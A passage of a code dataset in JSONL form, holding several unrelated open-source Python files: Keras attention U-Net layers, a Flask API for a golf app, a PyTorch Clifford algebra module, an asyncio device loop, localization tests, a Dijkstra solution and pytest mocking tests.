nb_filter, kernel_size=3, act = 'relu', thickness = 2, kernel_reg = None, normalize_layer = None):\n x = input_tensor\n\n if thickness == 0:\n return x\n \n for i in range(thickness):\n x = Conv2D(nb_filter, (3,3), name='conv'+stage+'_'+str(i+1), kernel_initializer = 'he_normal', padding='same', kernel_regularizer = kernel_reg)(x)\n #x = Dropout(dropout_rate, name='dp'+stage+'_'+str(i+1))(x)\n if normalize_layer == 'bn':\n x = BatchNormalization(name = 'bn'+stage+'_'+str(i+1))(x)\n elif normalize_layer == 'mvn':\n x = Lambda(mvn, name = 'lambda'+stage+'_'+str(i+1))(x)\n x = Activation(act, name='act'+stage+'_'+str(i+1))(x)\n\n return x\n\ndef standard_block_t2(input_tensor, stage, nb_filter, kernel_size=3, act = 'relu', thickness = 2, kernel_reg = None, normalize_layer = None):\n x = input_tensor\n\n if thickness == 0:\n return x\n \n for i in range(thickness):\n x = Conv2D(nb_filter, (kernel_size, kernel_size), name='conv'+stage+'_'+str(i+1), activation = act, kernel_initializer = 'he_normal', padding='same', kernel_regularizer = kernel_reg)(x)\n #x = Dropout(dropout_rate, name='dp'+stage+'_'+str(i+1))(x)\n if normalize_layer == 'bn':\n x = BatchNormalization(name = 'bn'+stage+'_'+str(i+1))(x)\n elif normalize_layer == 'mvn':\n x = Lambda(mvn, name = 'lambda'+stage+'_'+str(i+1))(x)\n\n return x\n\ndef expend_as(tensor, rep, name):\n my_repeat = Lambda(lambda x, repnum: K.repeat_elements(x, repnum, axis=3), arguments={'repnum': rep},\n name='psi_up' + name)(tensor)\n return my_repeat\n\ndef AttnGatingBlock(x, g, inter_shape, name, normalize_layer = 'bn'):\n ''' take g which is the spatially smaller signal, do a conv to get the same\n number of feature channels as x (bigger spatially)\n do a conv on x to also get same geature channels (theta_x)\n then, upsample g to be same size as x\n add x and g (concat_xg)\n relu, 1x1 conv, then sigmoid then upsample the final - this gives us attn coefficients'''\n\n shape_x = K.int_shape(x) # 32\n shape_g = K.int_shape(g) # 16\n\n theta_x = Conv2D(inter_shape, (2, 2), strides=(2, 2), padding='same', name='xl' + name)(x) # 16\n shape_theta_x = K.int_shape(theta_x)\n\n phi_g = Conv2D(inter_shape, (1, 1), padding='same')(g)\n upsample_g = Conv2DTranspose(inter_shape, (3, 3),\n strides=(shape_theta_x[1] // shape_g[1], shape_theta_x[2] // shape_g[2]),\n padding='same', name='g_up' + name)(phi_g) # 16\n\n concat_xg = add([upsample_g, theta_x])\n act_xg = Activation('relu')(concat_xg)\n psi = Conv2D(1, (1, 1), padding='same', name='psi' + name)(act_xg)\n sigmoid_xg = Activation('sigmoid')(psi)\n shape_sigmoid = K.int_shape(sigmoid_xg)\n upsample_psi = UpSampling2D(size=(shape_x[1] // shape_sigmoid[1], shape_x[2] // shape_sigmoid[2]))(sigmoid_xg) # 32\n\n upsample_psi = expend_as(upsample_psi, shape_x[3], name)\n y = multiply([upsample_psi, x], name='q_attn' + name)\n\n result = Conv2D(shape_x[3], (1, 1), padding='same', name='q_attn_conv' + name)(y)\n if normalize_layer == 'bn':\n result_bn = BatchNormalization(name='q_attn_bn' + name)(result)\n elif normalize_layer == 'mvn':\n result_bn = Lambda(mvn, name='q_attn_mvn' + name)(result)\n return result_bn\n\n\ndef UnetConv2D(input, outdim, is_batchnorm, name, kinit = 'glorot_normal'):\n x = Conv2D(outdim, (3, 3), strides=(1, 1), kernel_initializer=kinit, padding=\"same\", name=name + '_1')(input)\n if is_batchnorm:\n x = BatchNormalization(name=name + '_1_bn')(x)\n x = Activation('relu', name=name + '_1_act')(x)\n\n x = Conv2D(outdim, (3, 3), strides=(1, 1), kernel_initializer=kinit, padding=\"same\", name=name + '_2')(x)\n if is_batchnorm:\n x = BatchNormalization(name=name + '_2_bn')(x)\n x = Activation('relu', name=name + '_2_act')(x)\n return x\n\n\ndef UnetGatingSignal(input, name, normalize_layer = 'bn', act = 'relu'):\n ''' this is simply 1x1 convolution, bn, activation '''\n shape = K.int_shape(input)\n x = Conv2D(shape[3], (1, 1), strides=(1, 1), padding=\"same\", name=name + '_conv')(input)\n if normalize_layer == 'bn':\n x = BatchNormalization(name=name + '_bn')(x)\n elif normalize_layer == 'mvn':\n x = Lambda(mvn, name=name + 'mvn')(x)\n x = Activation(act, name=name + '_act')(x)\n return x\n\ndef UnetGatingSignal_t2(input, name, nb_filter, normalize_layer = 'bn', act = 'relu'):\n ''' this is simply 1x1 convolution, bn, activation '''\n x = Conv2D(nb_filter, (1, 1), strides=(1, 1), padding=\"same\", name=name + '_conv')(input)\n if normalize_layer == 'bn':\n x = BatchNormalization(name=name + '_bn')(x)\n elif normalize_layer == 'mvn':\n x = Lambda(mvn, name=name + 'mvn')(x)\n x = Activation(act, name=name + '_act')(x)\n return x\n\n##############################################################################################\n#Att_unet_t3 additional functions\ndef attention_block_2d(x, g, inter_channel):\n theta_x = Conv2D(inter_channel, [1, 1], strides=[1, 1])(x)\n phi_g = Conv2D(inter_channel, [1, 1], strides=[1, 1])(g)\n f = Activation('relu')(add([theta_x, phi_g]))\n psi_f = Conv2D(1, [1, 1], strides=[1, 1])(f)\n rate = Activation('sigmoid')(psi_f)\n att_x = multiply([x, rate])\n return att_x\n\n\ndef attention_up_and_concate(down_layer, layer,inter_ratio = 0.25, opt_skip=concatenate):\n # in_channel = down_layer.get_shape().as_list()[3]\n in_channel = down_layer._keras_shape[-1]\n # up = Conv2DTranspose(out_channel, [2, 2], strides=[2, 2])(down_layer)\n up = UpSampling2D(size=(2, 2))(down_layer)\n layer = attention_block_2d(x=layer, g=up, inter_channel=int(in_channel*inter_ratio))\n # my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=3))\n # concate = my_concat([up, layer])\n concate = opt_skip([up, layer])\n return concate\n\ndef attention_up_and_concate_t2(down_layer, layer,inter_ratio = 0.25, opt_skip=concatenate):\n # in_channel = down_layer.get_shape().as_list()[3]\n in_channel = down_layer._keras_shape[-1]\n # up = Conv2DTranspose(out_channel, [2, 2], strides=[2, 2])(down_layer)\n up = UpSampling2D(size=(2, 2))(down_layer)\n layer = attention_block_2d(x=layer, g=up, inter_channel=int(in_channel*inter_ratio))\n # my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=3))\n # concate = my_concat([up, layer])\n concate = opt_skip([Conv2DTranspose(in_channel, [2,2], strides=[2,2], padding='same')(down_layer), layer])\n return concate","repo_name":"tswizzle141/FCN-Based-Method-for-Left-Ventricle-Endocardium-and-Epicardium-Segmentation-with-New-Block-Modules","sub_path":"addition_layers.py","file_name":"addition_layers.py","file_ext":"py","file_size_in_byte":10235,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25010270507","text":"from flask import jsonify, request\nfrom flask_classful import FlaskView, route\nfrom golfrica_app import db\nfrom golfrica_app.Factories.BLFactory import BL\nfrom golfrica_app.Factories.ModelFactory import MF\nfrom golfrica_app.Globals.JSONResponses import AuthorizeRequest, notLoggedIn, dataSavedResponse, \\\n dataNotSavedResponse, get_decoded\n\n\nclass Swap(FlaskView):\n response = dict({\"isLoggedIn\": True})\n\n def index(self):\n print(request.headers)\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n swaps = BL.getBL(\"swap\").getSwaps(user)\n return jsonify(swaps)\n\n def get(self, id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n self.response.update({\"country\": BL.getBL(\"swap\").getCountryById(id)})\n return jsonify(self.response)\n\n @route(\"/status//\")\n def swap_status(self, status_id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n isFound, status = BL.getBL(\"status\").getStatusByIdObject(status_id)\n print(status.status_id)\n\n if not isFound:\n self.response.update({\n \"isSwaped\": False,\n 'message': 'Status not found.',\n 'msg_type': 'error'\n })\n\n isSwaped, message, msg_type = BL.getBL(\"swap\").swapStatus(user, status)\n self.response.update({\n \"isSwaped\": isSwaped,\n 'message': message,\n 'msg_type': msg_type\n })\n return jsonify(self.response)\n\n @route(\"/swap_status///\")\n def swap_status_with_user(self, status_id, user_id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n isFound, status = BL.getBL(\"status\").getStatusByIdObject(status_id)\n isUserFound, swap_with = BL.getBL(\"user\").getUserObjectById(user_id)\n\n if not isFound or not isUserFound:\n self.response.update({\n \"isSwaped\": False,\n 'message': 'Status not found.',\n 'msg_type': 'error'\n })\n\n isSwaped, message, msg_type = BL.getBL(\"swap\").swapStatus(user, status, swap_with)\n self.response.update({\n \"isSwaped\": isSwaped,\n 'message': message,\n 'msg_type': msg_type\n })\n return jsonify(self.response)\n\n @route(\"/unswap_status///\")\n def unswap_status_with_user(self, status_id, user_id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n model = MF.getModel(\"swap\")\n swap = model.query.filter_by(status_id=status_id,swaper_id=user.user_id, swaped_with_id=user_id)\n if not swap.count() > 0:\n self.response.update({\n \"isUnSwaped\": False,\n 'message': \"No such swap found\",\n })\n\n swap = swap.first()\n try:\n db.session.delete(swap)\n db.session.commit()\n self.response.update({\n \"isUnSwaped\": True,\n 'message': \"Unswaped\",\n })\n except Exception as e:\n print(e)\n self.response.update({\n \"isUnSwaped\": False,\n 'message': \"Error occurred, Please try again.\",\n })\n return jsonify(self.response)\n\n @route(\"/comment_status/\", methods=['post'])\n def commentStatus(self):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n print(request.form['data'])\n data = get_decoded(request.form['data'])\n print(data)\n if not data:\n self.response.update({\n \"isCommented\": False,\n \"messageOrComment\": 'Invalid data provided.',\n \"msg_type\": 'error'\n })\n return jsonify(self.response)\n\n isFound, status = BL.getBL(\"status\").getStatusByIdObject(data['status_id'])\n if isFound:\n isCommented, messageOrComment, msg_type = BL.getBL(\"swap\").commentStatus(user, status, data['comment'],\n data['rating'])\n self.response.update({\n \"isCommented\": isCommented,\n \"messageOrComment\": messageOrComment,\n \"msg_type\": msg_type\n })\n return jsonify(self.response)\n self.response.update({\n \"isCommented\": False,\n \"messageOrComment\": 'No such status found',\n \"msg_type\": 'error'\n })\n return jsonify(self.response)\n\n def put(self):\n pass\n\n def post(self):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n form = request.form\n isUpdated, countryOrException = BL.getBL(\"swap\").addCountry(form)\n if isUpdated:\n dataSavedResponse.update({\"country\": countryOrException})\n return jsonify(dataSavedResponse)\n dataNotSavedResponse.update({\"message\": countryOrException})\n return jsonify(dataNotSavedResponse)\n\n def delete(self, id):\n pass\n\n def notifications(self):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n isSwapNotificationsFound, swaps = BL.getBL(\"swap\").getSwapNotifications(user)\n self.response.update({\"isSwapNotificationsFound\": isSwapNotificationsFound, \"swaps\": swaps})\n return jsonify(self.response)\n\n def approve(self, id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n swap = BL.getBL(\"swap\").getSwapObjectById(id)\n if not swap:\n self.response.update({\"isSwapApproved\": False, \"message\": 'Swap not found.', 'msg_type': 'error'})\n return jsonify(self.response)\n\n isSwapApproved, message, msg_type = BL.getBL(\"swap\").approveSwap(user, swap)\n self.response.update({\"isSwapApproved\": isSwapApproved, \"message\": message, 'msg_type': msg_type})\n return jsonify(self.response)\n\n def decline(self, id):\n user = AuthorizeRequest(request.headers)\n if not user:\n return jsonify(notLoggedIn)\n\n swap = BL.getBL(\"swap\").getSwapObjectById(id)\n if not swap:\n self.response.update({\"isSwapDeclined\": False, \"message\": 'Swap not found.', 'msg_type': 'error'})\n return jsonify(self.response)\n\n isSwapDeclined, message, msg_type = BL.getBL(\"swap\").declineSwap(user, swap)\n self.response.update({\"isSwapDeclined\": isSwapDeclined, \"message\": message, 'msg_type': msg_type})\n return jsonify(self.response)\n","repo_name":"theirfanirfi/golfapp-apis","sub_path":"golfrica_app/Views/Statuses/Swap.py","file_name":"Swap.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9225393541","text":"import functools\nimport math\n\nimport torch\nfrom torch import nn\n\nfrom .metric import ShortLexBasisBladeOrder, construct_gmt, gmt_element\n\n\nclass CliffordAlgebra(nn.Module):\n def __init__(self, metric):\n super().__init__()\n\n self.register_buffer(\"metric\", torch.as_tensor(metric))\n self.num_bases = len(metric)\n self.bbo = ShortLexBasisBladeOrder(self.num_bases)\n self.dim = len(self.metric)\n self.n_blades = len(self.bbo.grades)\n cayley = (\n construct_gmt(\n self.bbo.index_to_bitmap, self.bbo.bitmap_to_index, self.metric\n )\n .to_dense()\n .to(torch.get_default_dtype())\n )\n self.grades = self.bbo.grades.unique()\n self.register_buffer(\n \"subspaces\",\n torch.tensor(tuple(math.comb(self.dim, g) for g in self.grades)),\n )\n self.n_subspaces = len(self.grades)\n self.grade_to_slice = self._grade_to_slice(self.subspaces)\n self.grade_to_index = [\n torch.tensor(range(*s.indices(s.stop))) for s in self.grade_to_slice\n ]\n\n self.register_buffer(\n \"bbo_grades\", self.bbo.grades.to(torch.get_default_dtype())\n )\n self.register_buffer(\"even_grades\", self.bbo_grades % 2 == 0)\n self.register_buffer(\"odd_grades\", ~self.even_grades)\n self.register_buffer(\"cayley\", cayley)\n\n def geometric_product(self, a, b, blades=None):\n cayley = self.cayley\n\n if blades is not None:\n blades_l, blades_o, blades_r = blades\n assert isinstance(blades_l, torch.Tensor)\n assert isinstance(blades_o, torch.Tensor)\n assert isinstance(blades_r, torch.Tensor)\n cayley = cayley[blades_l[:, None, None], blades_o[:, None], blades_r]\n\n return torch.einsum(\"...i,ijk,...k->...j\", a, cayley, b)\n\n def _grade_to_slice(self, subspaces):\n grade_to_slice = list()\n subspaces = torch.as_tensor(subspaces)\n for grade in self.grades:\n index_start = subspaces[:grade].sum()\n index_end = index_start + math.comb(self.dim, grade)\n grade_to_slice.append(slice(index_start, index_end))\n return grade_to_slice\n\n @functools.cached_property\n def _alpha_signs(self):\n return torch.pow(-1, self.bbo_grades)\n\n @functools.cached_property\n def _beta_signs(self):\n return torch.pow(-1, self.bbo_grades * (self.bbo_grades - 1) // 2)\n\n @functools.cached_property\n def _gamma_signs(self):\n return torch.pow(-1, self.bbo_grades * (self.bbo_grades + 1) // 2)\n\n def alpha(self, mv, blades=None):\n signs = self._alpha_signs\n if blades is not None:\n signs = signs[blades]\n return signs * mv.clone()\n\n def beta(self, mv, blades=None):\n signs = self._beta_signs\n if blades is not None:\n signs = signs[blades]\n return signs * mv.clone()\n\n def gamma(self, mv, blades=None):\n signs = self._gamma_signs\n if blades is not None:\n signs = signs[blades]\n return signs * mv.clone()\n\n def zeta(self, mv):\n return mv[..., :1]\n\n def embed(self, tensor: torch.Tensor, tensor_index: torch.Tensor) -> torch.Tensor:\n mv = torch.zeros(\n *tensor.shape[:-1], 2**self.dim, device=tensor.device, dtype=tensor.dtype\n )\n mv[..., tensor_index] = tensor\n return mv\n\n def embed_grade(self, tensor: torch.Tensor, grade: int) -> torch.Tensor:\n mv = torch.zeros(*tensor.shape[:-1], 2**self.dim, device=tensor.device)\n s = self.grade_to_slice[grade]\n mv[..., s] = tensor\n return mv\n\n def get(self, mv: torch.Tensor, blade_index: tuple[int]) -> torch.Tensor:\n blade_index = tuple(blade_index)\n return mv[..., blade_index]\n\n def get_grade(self, mv: torch.Tensor, grade: int) -> torch.Tensor:\n s = self.grade_to_slice[grade]\n return mv[..., s]\n\n def b(self, x, y, blades=None):\n if blades is not None:\n assert len(blades) == 2\n beta_blades = blades[0]\n blades = (\n blades[0],\n torch.tensor([0]),\n blades[1],\n )\n else:\n blades = torch.tensor(range(self.n_blades))\n blades = (\n blades,\n torch.tensor([0]),\n blades,\n )\n beta_blades = None\n\n return self.geometric_product(\n self.beta(x, blades=beta_blades),\n y,\n blades=blades,\n )\n\n def q(self, mv, blades=None):\n if blades is not None:\n blades = (blades, blades)\n return self.b(mv, mv, blades=blades)\n\n def _smooth_abs_sqrt(self, input, eps=1e-16):\n return (input**2 + eps) ** 0.25\n\n def norm(self, mv, blades=None):\n return self._smooth_abs_sqrt(self.q(mv, blades=blades))\n\n def norms(self, mv, grades=None):\n if grades is None:\n grades = self.grades\n return [\n self.norm(self.get_grade(mv, grade), blades=self.grade_to_index[grade])\n for grade in grades\n ]\n\n def qs(self, mv, grades=None):\n if grades is None:\n grades = self.grades\n return [\n self.q(self.get_grade(mv, grade), blades=self.grade_to_index[grade])\n for grade in grades\n ]\n\n def sandwich(self, u, v, w):\n return self.geometric_product(self.geometric_product(u, v), w)\n\n def output_blades(self, blades_left, blades_right):\n blades = []\n for blade_left in blades_left:\n for blade_right in blades_right:\n bitmap_left = self.bbo.index_to_bitmap[blade_left]\n bitmap_right = self.bbo.index_to_bitmap[blade_right]\n bitmap_out, _ = gmt_element(bitmap_left, bitmap_right, self.metric)\n index_out = self.bbo.bitmap_to_index[bitmap_out]\n blades.append(index_out)\n\n return torch.tensor(blades)\n\n def random(self, n=None):\n if n is None:\n n = 1\n return torch.randn(n, self.n_blades)\n\n def random_vector(self, n=None):\n if n is None:\n n = 1\n vector_indices = self.bbo_grades == 1\n v = torch.zeros(n, self.n_blades, device=self.cayley.device)\n v[:, vector_indices] = torch.randn(\n n, vector_indices.sum(), device=self.cayley.device\n )\n return v\n\n def parity(self, mv):\n is_odd = torch.all(mv[..., self.even_grades] == 0)\n is_even = torch.all(mv[..., self.odd_grades] == 0)\n\n if is_odd ^ is_even: # exclusive or (xor)\n return is_odd\n else:\n raise ValueError(\"This is not a homogeneous element.\")\n\n def eta(self, w):\n return (-1) ** self.parity(w)\n\n def alpha_w(self, w, mv):\n return self.even_grades * mv + self.eta(w) * self.odd_grades * mv\n\n def inverse(self, mv, blades=None):\n mv_ = self.beta(mv, blades=blades)\n return mv_ / self.q(mv)\n\n def rho(self, w, mv):\n \"\"\"Applies the versor w action to mv.\"\"\"\n return self.sandwich(w, self.alpha_w(w, mv), self.inverse(w))\n\n def reduce_geometric_product(self, inputs):\n return functools.reduce(self.geometric_product, inputs)\n\n def versor(self, order=None, normalized=True):\n if order is None:\n order = self.dim if self.dim % 2 == 0 else self.dim - 1\n vectors = self.random_vector(order)\n versor = self.reduce_geometric_product(vectors[:, None])\n if normalized:\n versor = versor / self.norm(versor)[..., :1]\n return versor\n\n def rotor(self):\n return self.versor()\n\n @functools.cached_property\n def geometric_product_paths(self):\n gp_paths = torch.zeros((self.dim + 1, self.dim + 1, self.dim + 1), dtype=bool)\n\n for i in range(self.dim + 1):\n for j in range(self.dim + 1):\n for k in range(self.dim + 1):\n s_i = self.grade_to_slice[i]\n s_j = self.grade_to_slice[j]\n s_k = self.grade_to_slice[k]\n\n m = self.cayley[s_i, s_j, s_k]\n gp_paths[i, j, k] = (m != 0).any()\n\n return gp_paths\n","repo_name":"DavidRuhe/clifford-group-equivariant-neural-networks","sub_path":"algebra/cliffordalgebra.py","file_name":"cliffordalgebra.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"36220625016","text":"import asyncio\nfrom enum import Enum\nimport time\n\nclass DeviceException(Exception):\n\tpass\n\nclass DeviceStatus(Enum):\n\tSTOPPED = 0\n\tSTARTING = 1\n\tRUNNING = 2\n\tSTOPPING = 3\n\nclass Device:\n\tdef __init__(self, **kwargs):\n\t\tself.interval = kwargs.get(\"interval\", 0.010)\n\t\tself._lock = asyncio.Lock()\n\t\tself._status = DeviceStatus.STOPPED\n\t\tself._meas = None\n\t\n\tasync def run(self):\n\t\tawait self.set_status(DeviceStatus.STARTING)\n\t\tif await self.init():\n\t\t\tawait self.set_status(DeviceStatus.RUNNING)\n\t\t\twhile await self.status() == DeviceStatus.RUNNING:\n\t\t\t\tt = time.time()\n\t\t\t\tif not await self.cycle():\n\t\t\t\t\tbreak\n\t\t\t\tdelay = self.interval - (time.time() - t)\n\t\t\t\tif delay > 0:\n\t\t\t\t\tawait asyncio.sleep(delay)\n\t\t\tawait self.set_status(DeviceStatus.STOPPING)\n\t\t\tawait self.close()\n\t\tawait self.set_status(DeviceStatus.STOPPED)\n\t\n\tasync def status(self):\n\t\tasync with self._lock:\n\t\t\treturn self._status\n\t\n\tasync def set_status(self, status):\n\t\tasync with self._lock:\n\t\t\tself._status = status\n\t\n\tasync def stop(self):\n\t\tawait self.set_status(DeviceStatus.STOPPING)\n\t\n\tasync def init(self):\n\t\treturn True\n\t\n\tasync def close(self):\n\t\tpass\n\t\n\tasync def cycle(self):\n\t\treturn True\n\t\n\tasync def read(self):\n\t\tasync with self._lock:\n\t\t\treturn self._meas\n","repo_name":"molkoback/measmisc","sub_path":"measmisc/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29433765619","text":"# -*- coding: utf-8 -*-\n\nfrom unittest import TestCase\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nfrom flask_babel import Locale\n\nfrom app import create_app\nfrom app import db\nfrom app.configuration import TestConfiguration\nfrom app.localization import get_default_language\nfrom app.localization import get_language_names\nfrom app.localization import get_languages\nfrom app.localization import get_locale\nfrom app.userprofile import User\n\n\nclass LanguagesTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Initialize the test cases.\n \"\"\"\n\n self.app = create_app(TestConfiguration)\n self.app_context = self.app.app_context()\n self.app_context.push()\n self.request_context = self.app.test_request_context()\n self.request_context.push()\n db.create_all()\n\n self.default_language = 'en'\n self.path = 'mock/test'\n self.listdir_return_value = [\n 'de',\n 'en-US',\n 'not-a-language',\n '12-34',\n 'DE',\n 'DE-de',\n 'de-',\n 'de--',\n 'de--DE',\n 'de-DEE',\n 'de-AT-CH',\n '-DE',\n '-',\n '',\n ]\n\n def tearDown(self):\n \"\"\"\n Reset the test cases.\n \"\"\"\n\n db.session.remove()\n db.drop_all()\n self.request_context.pop()\n self.app_context.pop()\n\n def test_get_default_language(self):\n \"\"\"\n Test getting the default language.\n\n Expected result: 'en' is always returned.\n \"\"\"\n\n self.assertEqual(self.default_language, get_default_language())\n\n @patch('app.localization.languages.listdir')\n def test_get_language_names_with_native_names_english(self, mock_listdir: MagicMock):\n \"\"\"\n Test getting the list of language names with their native names (with 'en' as locale).\n\n Expected result: The list is returned and sorted by their name.\n \"\"\"\n\n mock_listdir.return_value = [\n 'es',\n 'fr',\n 'de',\n ]\n expected_names = [\n ('en', 'English'),\n ('fr', 'French (français)'),\n ('de', 'German (Deutsch)'),\n ('es', 'Spanish (español)'),\n ]\n\n names = get_language_names(TestConfiguration.TRANSLATION_DIR)\n mock_listdir.assert_called()\n self.assertListEqual(expected_names, list(names))\n\n @patch('app.localization.languages.get_current_locale')\n @patch('app.localization.languages.listdir')\n def test_get_language_names_with_native_names_german(self, mock_listdir: MagicMock,\n mock_get_current_locale: MagicMock):\n \"\"\"\n Test getting the list of language names with their native names (with 'de' as locale).\n\n Expected result: The list is returned and sorted by their name.\n \"\"\"\n\n mock_get_current_locale.return_value = Locale('de')\n mock_listdir.return_value = [\n 'es',\n 'fr',\n 'de',\n ]\n expected_names = [\n ('de', 'Deutsch'),\n ('en', 'Englisch (English)'),\n ('fr', 'Französisch (français)'),\n ('es', 'Spanisch (español)'),\n ]\n\n names = get_language_names(TestConfiguration.TRANSLATION_DIR)\n mock_listdir.assert_called()\n self.assertListEqual(expected_names, list(names))\n\n @patch('app.localization.languages.listdir')\n def test_get_language_names_without_native_names(self, mock_listdir: MagicMock):\n \"\"\"\n Test getting the list of language names without their native names.\n\n Expected result: The list is returned and sorted by their name.\n \"\"\"\n\n mock_listdir.return_value = [\n 'es',\n 'fr',\n 'de',\n ]\n expected_names = [\n ('en', 'English'),\n ('fr', 'French'),\n ('de', 'German'),\n ('es', 'Spanish'),\n ]\n\n names = get_language_names(TestConfiguration.TRANSLATION_DIR, with_native_names=False)\n mock_listdir.assert_called()\n self.assertListEqual(expected_names, list(names))\n\n @patch('app.localization.languages.listdir')\n def test_get_languages_default(self, mock_listdir: MagicMock):\n \"\"\"\n Run the `get_languages()` function with the default language.\n\n Expected result: A list containing the default `'en'` plus the valid languages from `listdir()`.\n \"\"\"\n\n mock_listdir.return_value = self.listdir_return_value\n\n languages = get_languages(self.path)\n\n mock_listdir.assert_called_with(self.path)\n self.assertListEqual([self.default_language, 'de', 'en-US'], list(languages))\n\n @patch('app.localization.languages.listdir')\n def test_get_languages_non_default(self, mock_listdir: MagicMock):\n \"\"\"\n Run the `get_languages()` function with a non-default language.\n\n Expected result: A list containing the non-default language plus the valid languages from `listdir()`.\n \"\"\"\n\n mock_listdir.return_value = self.listdir_return_value\n\n languages = get_languages(self.path, 'fr')\n\n mock_listdir.assert_called_with(self.path)\n self.assertListEqual(['fr', 'de', 'en-US'], list(languages))\n\n @patch('app.localization.languages.listdir')\n def test_get_languages_nonexistent_path(self, mock_listdir: MagicMock):\n \"\"\"\n Run the get_languages() function with a non-existent path (and default language).\n\n Expected result: A list simply containing the default language, no errors.\n \"\"\"\n\n mock_listdir.side_effect = OSError\n\n languages = get_languages(self.path)\n\n self.assertListEqual([self.default_language], list(languages))\n\n @patch('app.localization.languages.request')\n def test_get_locale_from_user(self, mock_request: MagicMock):\n \"\"\"\n Test getting the locale from a user who is logged in.\n\n Expected result: The user's preferred language is returned.\n \"\"\"\n\n # Mock the best_match() function to ensure it is not called.\n mock_request.accept_languages = MagicMock()\n mock_request.accept_languages.best_match = MagicMock(return_value='de')\n\n email = 'test@example.com'\n name = 'Jane Doe'\n password = '123456'\n user = User(email, name)\n user.set_password(password)\n db.session.add(user)\n db.session.commit()\n\n user.login(email, password)\n\n user.settings._language = 'fr'\n language = get_locale()\n self.assertEqual(user.settings._language, language)\n mock_request.accept_languages.best_match.assert_not_called()\n\n @patch('app.localization.languages.request')\n def test_get_locale_from_request(self, mock_request: MagicMock):\n \"\"\"\n Test getting the locale if a user is not logged in.\n\n Expected result: 'de'.\n \"\"\"\n\n mock_request.accept_languages = MagicMock()\n mock_request.accept_languages.best_match = MagicMock(return_value='de')\n\n language = get_locale()\n self.assertEqual('de', language)\n","repo_name":"BMeu/Aerarium","sub_path":"tests/localization/languages_test.py","file_name":"languages_test.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18353550867","text":"import sys\nfrom heapq import heappush, heappop\nsys.setrecursionlimit(10 ** 5)\ninput = sys.stdin.readline\n\nn,m = map(int,input().split())\ngraph = [[] for _ in range(n+1)]\n\nfor _ in range(m):\n a,b,c = map(int,input().split())\n graph[a].append((c,b))\n graph[b].append((c,a))\n\n\ndist = [1e10 for _ in range(n+1)]\n\npq = []\nheappush(pq,(0,1))\ndist[1] = 0\n\n_m = {}\n\nwhile pq:\n here_dist, here = heappop(pq)\n if dist[here] != here_dist: continue\n for there_dist, there in graph[here]:\n if dist[there] > dist[here] + there_dist:\n if there in _m:\n _m[there] = here\n else:\n _m[there] = here\n\n dist[there] = dist[here] + there_dist\n heappush(pq,(dist[there], there))\nprint(len(_m))\nfor e in _m:\n print(f\"{_m[e]} {e}\")","repo_name":"tommy16102/2022-algorithm-study","sub_path":"2023/May/week4/이정욱/2211_네트워크복구.py","file_name":"2211_네트워크복구.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"6137539852","text":"import pytest\nimport requests\n\nfrom waves import get_unique_waves_packs\n\nwaves_mock = [\n {\"id\": \"1\", \"pack_id\": 1},\n {\"id\": \"2\", \"pack_id\": 2},\n {\"id\": \"3\", \"pack_id\": 2},\n {\"id\": \"3\", \"pack_id\": 1},\n]\n\n\ndef waves_oms_mock_response(status_code=200, data=waves_mock):\n response = requests.Response()\n response.status_code = status_code\n response.json = lambda: data\n\n return response\n\n\ndef test_get_oms_waves(mocker):\n requests_get_mock = mocker.patch(\"requests.get\")\n requests_get_mock.side_effect = [\n waves_oms_mock_response(),\n waves_oms_mock_response(data=[{\"id\": \"3\", \"pack_id\": 4}]),\n ]\n\n response = get_unique_waves_packs(number_of_requests=2)\n\n requests_get_mock.assert_has_calls(\n [\n mocker.call(\"https://6082d3aa5dbd2c001757a988.mockapi.io/oms/waves/1\"),\n mocker.call(\"https://6082d3aa5dbd2c001757a988.mockapi.io/oms/waves/2\"),\n ]\n )\n # Repeated assert\n assert requests_get_mock.call_count == 2\n\n assert response == {1, 2, 4}\n\n\ndef test_get_oms_waves_raises(mocker):\n requests_get_mock = mocker.patch(\"requests.get\")\n requests_get_mock.return_value = waves_oms_mock_response(\n status_code=400, data={\"message\": \"Api error.\"}\n )\n\n with pytest.raises(requests.exceptions.HTTPError):\n response = get_unique_waves_packs()\n\n requests_get_mock.assert_called_once_with(\n \"https://6082d3aa5dbd2c001757a988.mockapi.io/oms/waves/1\"\n )\n","repo_name":"rodolfolottin/pytest-mock-vs-responses","sub_path":"test_waves_pytest_mock.py","file_name":"test_waves_pytest_mock.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30819564851","text":"import lpips\nimport skimage\nimport torch\nfrom torchvision import transforms\n\n\ndef calculate_metrics(original_img, upscaled_img, device):\n \"\"\"\n Given an original high resolution image and a upscaled\n one, it calculates several metrics to assess the perfomance\n of a upscaling 